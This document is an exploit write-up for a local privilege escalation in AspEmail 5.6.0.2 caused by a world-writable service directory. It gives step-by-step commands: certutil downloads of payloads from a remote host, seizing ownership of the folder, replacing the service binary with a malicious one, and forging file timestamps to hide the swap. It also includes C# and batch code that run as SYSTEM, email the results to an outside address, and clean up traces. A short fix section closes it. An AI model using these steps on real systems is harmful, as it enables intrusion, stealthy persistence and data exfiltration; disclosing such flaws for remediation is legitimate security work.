Headline
AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation
AspEmail version 5.6.0.2 suffers from weak permission vulnerability that allows for local privilege escalation.
####################################################################################################################
Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation
Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]
Date: 13/04/2023
Exploit Author: Zer0FauLT [[email protected]]
Vendor Homepage: https://www.aspemail.com
Software Link: https://www.aspemail.com/download.html
Product: AspEmail
Version: AspEmail 5.6.0.2 and all
Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU
Tested on: Windows Server 2016 and Windows Server 2019
CVE : 0DAY
####################################################################################################################
==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
==================================================================================================================
- First, we will test whether the AspEmail service is active.
- First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
- We have detected that the process of the “Persits Software Email Agent” Service is state "RUNNING".
- Now we know that AspEmail service is active.
==================================================================================================================
- We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe “C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe” <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe “C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe”
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe “C:\Windows\Temp\Mail.exe”
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe “C:\Windows\Temp\Run.bat”
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 “C:\PenTest\PrivescCheck.ps1”
==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : “C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe” /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
- We detected “Persits Software EmailAgent” Service “Binary Permission Vulnerability” in our checks.
==================================================================================================================
[+] C:\PenTest>ICACLS “C:\Program Files (x86)\Persits Software\AspEmail”
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
- We do not have permission to access subdirectories.
==================================================================================================================
[+] C:\PenTest>ICACLS “C:\Program Files (x86)\Persits Software\AspEmail\BIN”
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
This is chmod 0777 - rwxrwxrwx in linux language.
# ================================================================================================================== [+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\Program Files (x86)\Persits Software\AspEmail\Bin\EmailAgent.exe"
\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
- We understood “EmailAgent.exe” processor was installed by the Administrator and the owner is the Administrator user.
==================================================================================================================
- Now we will take ownership of this directory as we will execute our operations under the “BIN” directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f “C:\Program Files (x86)\Persits Software\AspEmail\BIN”
SUCCESS: The file (or folder): “C:\Program Files (x86)\Persits Software\AspEmail\BIN” now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>"C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
- Ok. All commands resulted successfully. We now have full privileges for this directory.
==================================================================================================================
- Now we will modify the EmailAgent file and inject a self-written malware.
- We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> …
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== Renamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
- We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime “EmailAgent.exe” “24.03.2007 09:21:30” “24.03.2007 09:21:30” “23.05.2017 06:42:28”
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> …
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
- And time manipulation is over. They look like they were uploaded at the same time long ago.
==================================================================================================================
- Now we check for my malware ownership.
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\Program Files (x86)\Persits Software\AspEmail\Bin\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\Program Files (x86)\Persits Software\AspEmail\Bin\EmailAgent.exe"
\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] wmic useraccount where sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
=================================================================================================================#
####################################################################################################################
#[EmailAgent.exe]#
####################################################################################################################
#
- We program this malware in such a way that when the server is reboot(when the services are restarted), #
- It will be triggered and execute the codes we want, #
- And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:\Windows\Temp"); #
} #
} #
} #
#
####################################################################################################################
#[Mail.exe]#
####################################################################################################################
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient(“smtp.deepseclab.com”); #
var mail = new MailMessage(); #
mail.From = new MailAddress(“[email protected]”); #
mail.To.Add(“[email protected]”); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = “<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:\Windows\Temp\Export.txt”); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential(“[email protected]","p@ssw0rd123”); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
####################################################################################################################
#[Run.bat]#
####################################################################################################################
#
whoami > C:\Windows\Temp\Export.txt #
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:\Windows\Tasks #
del Run.bat & del Mail.exe #
#
####################################################################################################################
[+]Trigger Successful![+] #
#
[+] C:\PenTest>systeminfo | findstr “Boot Time” #
System Boot Time: 13.04.2022, 07:46:06 #
#
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
#
NT AUTHORITY\SYSTEM #
#
####################################################################################################################
==================================================================================================================
…|||[FIX]|||…
==================================================================================================================
[+] C:>Runas /profile /user:DeepSecLab\Administrator CMD [+]
=================================================================================================================#
[+] C:\Administrator>sc qc “Persits Software EmailAgent”
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : “C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe” /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
==================================================================================================================
[+] C:\Administrator>sc sdshow “Persits Software EmailAgent”
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc “Persits Software EmailAgent” -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright © 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS “C:\Program Files (x86)\Persits Software” /T /Q /C /RESET
[+] C:\PenTest>ICACLS “C:\Program Files (x86)\Persits Software\AspEmail\BIN”
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
==================================================================================================================
[+] C:\Administrator>sc stop “Persits Software EmailAgent”
[+] PS C:\Administrator> Start-Service -Name “Persits Software EmailAgent”
- These commands are optional. Used to stop the “Persits Software EmailAgent” service. We fixed the vulnerability and I don’t think it’s necessary anymore.